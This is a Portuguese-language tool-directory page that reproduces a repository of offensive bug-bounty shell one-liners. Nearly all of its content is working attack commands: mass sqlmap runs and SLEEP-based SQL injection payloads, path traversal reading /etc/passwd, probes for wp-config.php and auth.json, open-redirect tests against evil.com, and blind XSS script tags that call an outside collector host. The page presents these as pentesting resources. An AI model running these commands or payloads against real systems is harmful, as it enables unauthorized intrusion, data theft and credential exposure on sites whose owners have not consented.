Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
One-Liner-Collections — Este repositório contém uma lista de One Liners com descrições e requisitos de instalação. | Kitploit
Ferramentas/GitHubGitHub/cybertix-pvt-ltd/one-liner-collections
Scanners de VulnerabilidadesExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de PenetraçãoDetecção de SegredosEnumeração de SubdomíniosRecursos Curados

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
cybertix-pvt-ltd/one-liner-collections

One-Liner-Collections

Este repositório contém uma lista de One Liners com descrições e requisitos de instalação.

Ver Repositório
50981há 1 anoRevisado pelo Kitploit

One-Liner-Collections

Este repositório contém uma lista de One-Liners com descrições e requisitos de instalação.

────────────────────────────────────────────────────────────────────────

Injeção SQL

Requisitos de Instalação

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. GAU : https://github.com/lc/gau
  3. GF : https://github.com/tomnomnom/gf
  4. Findomain : https://github.com/Findomain/Findomain
  5. HTTPX : https://github.com/projectdiscovery/httpx
  6. Anew : https://github.com/tomnomnom/anew
  7. Waybackurls : https://github.com/tomnomnom/waybackurls
  8. SQLiDetector: https://github.com/eslam3kl/SQLiDetector

One-Liner

root@kitploit:~
echo http://testphp.vulnweb.com | waybackurls > wayback_urls_for_target.txt ; python3 sqlidetector.py -f  wayback_urls_for_target.txt

root@kitploit:~
subfinder -d http://TARGET.com -silent -all | gau - blacklist ttf,woff,svg,png | sort -u | gf sqli >gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli_report.txt
root@kitploit:~
findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
root@kitploit:~
cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI by Cybertix\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection\e[0m" ;done

root@kitploit:~
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

Injeção SQL cega baseada em cabeçalho

root@kitploit:~
cat domain.txt | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(13),0))OR" -rt -timeout 20 -mrt '>13'

Injeção SQL baseada em tempo

  1. apt install moreutils
  2. apt install parallel
root@kitploit:~
cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt

Injeção SQL baseada em tempo usando Waybackurls

root@kitploit:~
waybackurls https://TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt 
root@kitploit:~
cat urls.txt | sed 's/=/=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END)/g' | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && time curl "'{}'"'

────────────────────────────────────────────────────────────────────────

Redirecionamento Aberto

Requisitos de Instalação

  1. Waybackurls : https://github.com/tomnomnom/waybackurls
  2. Bhedak : https://github.com/R0X4R/bhedak
  3. GAU : https://github.com/lc/gau
  4. GF : https://github.com/tomnomnom/gf
  5. QS-Replace : https://github.com/tomnomnom/qsreplace
  6. HTTPX : https://github.com/projectdiscovery/httpx
  7. Subfinder : https://github.com/projectdiscovery/subfinder
  8. Httprobe : https://github.com/tomnomnom/httprobe
  9. Nuclei : https://github.com/projectdiscovery/nuclei

One-Liner

root@kitploit:~
waybackurls TARGET.COM | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I| grep "evil.com" && echo "$host \033[0;31mVulnerable\n" ;done
root@kitploit:~
subfinder -dL domains.txt | httprobe |tee live_domain.txt; cat live_domain.txt | waybackurls | tee wayback.txt; cat wayback.txt | sort -u | grep "\?" > open.txt; nuclei -t Url-Redirection-Catcher.yaml -l open.txt

────────────────────────────────────────────────────────────────────────

Path Traversal no NGINX

Requisitos de Instalação

  1. HTTPX : https://github.com/projectdiscovery/httpx

One-Liner

root@kitploit:~
httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'

────────────────────────────────────────────────────────────────────────

Tomada de Subdomínio

Requisitos de Instalação

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. Assetfinder : https://github.com/tomnomnom/assetfinder
  3. Amass : https://github.com/OWASP/Amass
  4. Subjack : https://github.com/haccer/subjack

One-Liner

root@kitploit:~
subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/cybertix/subjack/fingerprints.json -v 3 >> takeover ;

────────────────────────────────────────────────────────────────────────

Extrair URLs do Código-Fonte

One-Liner

root@kitploit:~
curl "https://TARGET.Com" | grep -oP '(https*.//|www\.)[^]*'

────────────────────────────────────────────────────────────────────────

XSS (Scripting Entre Sites)

Requisitos de Instalação

  1. Katana : https://github.com/projectdiscovery/katana
  2. Dalfox : https://github.com/hahwul/dalfox
  3. Waybackurls : https://github.com/tomnomnom/waybackurls
  4. GF : https://github.com/tomnomnom/gf
  5. Dalfox : https://github.com/hahwul/dalfox
  6. HTTPX : https://github.com/projectdiscovery/httpx

One-Liner

root@kitploit:~
echo http://testphp.vulnweb.com | katana -jc -f qurl -d 5 -c 50 -kf robotstxt,sitemapxml -silent | dalfox pipe --skip-bav
root@kitploit:~
waybackurls http://testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee XSS.txt && cat XSS.txt | dalfox -b http://chirag.bxss.in pipe > output.txt
root@kitploit:~
cat http://target.com | gau --subs | grep "https://" | grep -v "png\|jpg\|css\|js\|gif\|txt" | grep "=" | uro | dalfox pipe --deep-domxss --multicast --blind https://chirag.bxss.in

Caça em massa de XSS cego

root@kitploit:~
cat domain.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://chirag.bxss.in></script>"

────────────────────────────────────────────────────────────────────────

Encontre Endpoints em JS

Requisitos de Instalação

  1. Katana : https://github.com/projectdiscovery/katana
  2. Anew : https://github.com/tomnomnom/anew

One-Liner

root@kitploit:~
katana -u http://testphp.vulnweb.com -js-crawl -d 5 -hl -filed endpoint | anew endpoint.txt

────────────────────────────────────────────────────────────────────────

One-Liner para CVE-2023-23752 - Verificação de Acesso Incorreto no Joomla no Endpoint do Webservice

Requisitos de Instalação

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

One-Liner

root@kitploit:~
subfinder -d http://TARGET.COM -silent -all | httpx -silent -path 'api/index.php/v1/config/application?public=true' -mc 200

────────────────────────────────────────────────────────────────────────

One-Liner de XSS CVE-2023-29489 do cPanel

Requisitos de Instalação

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

One-Liner

root@kitploit:~
subfinder -d http://example.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path '/cpanelwebcall/aaaaaaaaaaaaaaa' -mc 400

────────────────────────────────────────────────────────────────────────

One-Liner WP-Config

Requisitos de Instalação

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

One-Liner

root@kitploit:~
subfinder -silent -d TARGET.com | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8088 -path "/wp-config.PHP" -mc 200 -t 60 -status-code

────────────────────────────────────────────────────────────────────────

One-Liner para Encontrar Segredos em JS

Requisitos de Instalação

  1. Gau : https://github.com/lc/gau
  2. HTTPX : https://github.com/projectdiscovery/httpx
  3. Nuclei : https://github.com/projectdiscovery/nuclei

One-Liner

root@kitploit:~
echo TARGET.com | gau | grep ".js" | httpx -content-type | grep 'application/javascript' | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt

────────────────────────────────────────────────────────────────────────

Despejo de memória e divulgação de variáveis de ambiente

Requisitos de Instalação

  1. Shodan : https://www.shodan.io

One-Liner

root@kitploit:~
shodan search org: "Target" http.favicon.hash:116323821 --fields ip_str,port--separator | awk '{print $1 $2}'

────────────────────────────────────────────────────────────────────────

Divulgação de Informações Mais Fácil no Corpo JSON

Requisitos de Instalação

  1. Waybackurls : https://github.com/tomnomnom/waybackurls
  2. HTTPX : https://github.com/projectdiscovery/httpx

One-Liner

root@kitploit:~
cat subdomains.txt | waybackurls | httpx -mc 200 -ct | grep application/json

────────────────────────────────────────────────────────────────────────

Fuzz com 127.0.0.1 como Cabeçalho Host

Requisitos de Instalação

  1. FFUF : https://github.com/ffuf/ffuf

One-Liner

root@kitploit:~
ffuf -u https://target[.]com/FUZZ -H “Host: 127.0.0.1” -w /home/user/path/to/wordlist.txt -fs <regular_content_length>

────────────────────────────────────────────────────────────────────────

CVE-2023-0126 Vulnerabilidade de Path Traversal Pré-autenticação no SMA1000

One-Liner

root@kitploit:~
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done

────────────────────────────────────────────────────────────────────────

Obtenha o Hash do Favicon do seu Domínio Alvo

One-Liner

root@kitploit:~
curl -s -L -k https://TARGET.COM/favicon.ico | python3 -c 'import mmh3, sys, codecs; print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),"base64")))'

────────────────────────────────────────────────────────────────────────

One-Liner CVE-2023-22515 Confluence Data Center & Server: Escalação de Privilégios

One-Liner

root@kitploit:~
cat file.txt | while read host do; do curl -skL "http://$host/setup/setupadministrator.action" | grep -i "<title>Setup System Administrator" && echo $host "Vulnerable"; done

────────────────────────────────────────────────────────────────────────

CVE-2023-22518 - Vulnerabilidade de Autorização Incorreta no Confluence Data Center e Server

One-Liner

root@kitploit:~
subfinder -d TARGET.COM -silent | httpx -silent | nuclei -t CVE-2023-22518.yaml

────────────────────────────────────────────────────────────────────────

Extrair Informações Sensíveis no Endpoint /auth.json.

One-Liner

root@kitploit:~
subfinder -d TARGET.COM | httpx -path "/auth.json" -title -status-code -content-length -t 80 -p 80,443,8080,8443,9000,9001,9002,9003

────────────────────────────────────────────────────────────────────────

Use xargs com gau para escanear domínios em massa sem perder velocidade.

Requisitos de Instalação

  1. GAU : https://github.com/lc/gau

One-Liner

root@kitploit:~
xargs -a alive.txt -I@ sh -c 'gau --blacklist css,jpg,jpeg,JPEG,ott,svg,js,ttf,png,woff2,woff,eot,gif "@"' | tee -a gau.txt

────────────────────────────────────────────────────────────────────────

XSS Cego no Cabeçalho X-Forwarded-For.

Requisitos de Instalação

  1. BXSS : https://github.com/ethicalhackingplayground/bxss
  2. GAU : https://github.com/lc/gau
  3. Findomain : https://github.com/Findomain/Findomain

One-Liner

root@kitploit:~
findomain -t TARGET.COM | gau | bxss -payload '"><script src=https://chirag.bxss.in></script>' -header "X-Forwarded-For"

────────────────────────────────────────────────────────────────────────

Enumeração de Subdomínios com o Google Tag Manager.

One-Liner

root@kitploit:~
curl -s "https://www.googletagmanager.com/gtm.js?id=[TARGET-GTM-ID]" | grep -oP '"key","[a-zA-Z0-9.-]+\.[a-z]{2,}"' | awk -F'"' '{print $4}'

────────────────────────────────────────────────────────────────────────

Pesquise por Configurações do Kubernetes em uma Organização Específica e Verifique-as para Obter Informações Adicionais.

One-Liner

root@kitploit:~
shodan search org:"google" product:"Kubernetes" | awk '{print $3}' | httpx -path /pods -content-length -status-code -title

────────────────────────────────────────────────────────────────────────

Divulgação de Arquivos Internos no NodeJS Elastic.

Referência:

https://tripla.dk/2020/03/26/multiple-vulnerabilities-in-nodejs-ecstatic-http-server-http-party/#:~:text=4.%20INTERNAL%20PATH%20DISCLOSURE

One-Liner

root@kitploit:~
while read -r domain; do url="$domain/$(python3 -c 'print("A"*500)')"; response=$(curl -s "$url" 2>/dev/null); if echo "$response" | grep -q "ENAMETOOLONG.*stat"; then echo -e "[VULNERABLE] $url\n$(echo "$response" | grep 'ENAMETOOLONG')"; else echo "[SAFE] $domain"; fi; done < listofdomain.txt

────────────────────────────────────────────────────────────────────────

One-Liner para Encontrar Buckets S3

Requisitos de Instalação:

  1. Assetfinder: https://github.com/tomnomnom/assetfinder
  2. HTTPX:https://github.com/projectdiscovery/httpx
  3. Anew: https://github.com/tomnomnom/anew
  4. Meg: https://github.com/tomnomnom/meg
  5. GF Pattern: https://github.com/thecybertix/GF-Patterns

One-Liner

root@kitploit:~
assetfinder --subs-only TARGET.COM | httpx | anew hosts; meg -d 1000 -v /; gf s3-buckets
Baixar ferramenta